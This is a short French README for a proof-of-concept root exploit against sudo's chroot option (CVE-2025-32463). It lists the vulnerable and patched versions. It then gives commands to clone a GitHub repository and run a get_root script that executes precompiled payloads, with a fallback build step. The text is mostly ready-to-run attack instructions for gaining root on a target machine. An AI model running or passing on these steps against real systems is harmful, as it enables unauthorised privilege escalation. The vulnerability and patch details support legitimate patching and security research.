
- Vulnérable : sudo 1.9.14, 1.9.15, 1.9.16, 1.9.17 - Corrigé dans : sudo 1.9.17p1 et versions ultérieures - Les versions héritées antérieures à 1.9.14 ne sont pas concernées, car elles ne prennent pas en charge l'option --chroot.
# get_root.sh et get_root.py font la même chose.
git clone https://github.com/shazed-x/CVE-2025-32463
cd CVE-2025-32463
./get_root.sh
Aucun gcc n'est requis sur la machine cible. Le PoC fonctionne en vérifiant l'architecture actuelle (par exemple, x86_64, aarch64), puis en exécutant la charge utile dynamique pré-compilée correspondante. Si cela échoue, il utilise par défaut la charge utile statique.
Si l'exploit échoue sur votre machine, vous pouvez toujours le compiler en utilisant :
./mkall-dynamic.sh
# puis exécutez
./get_root.sh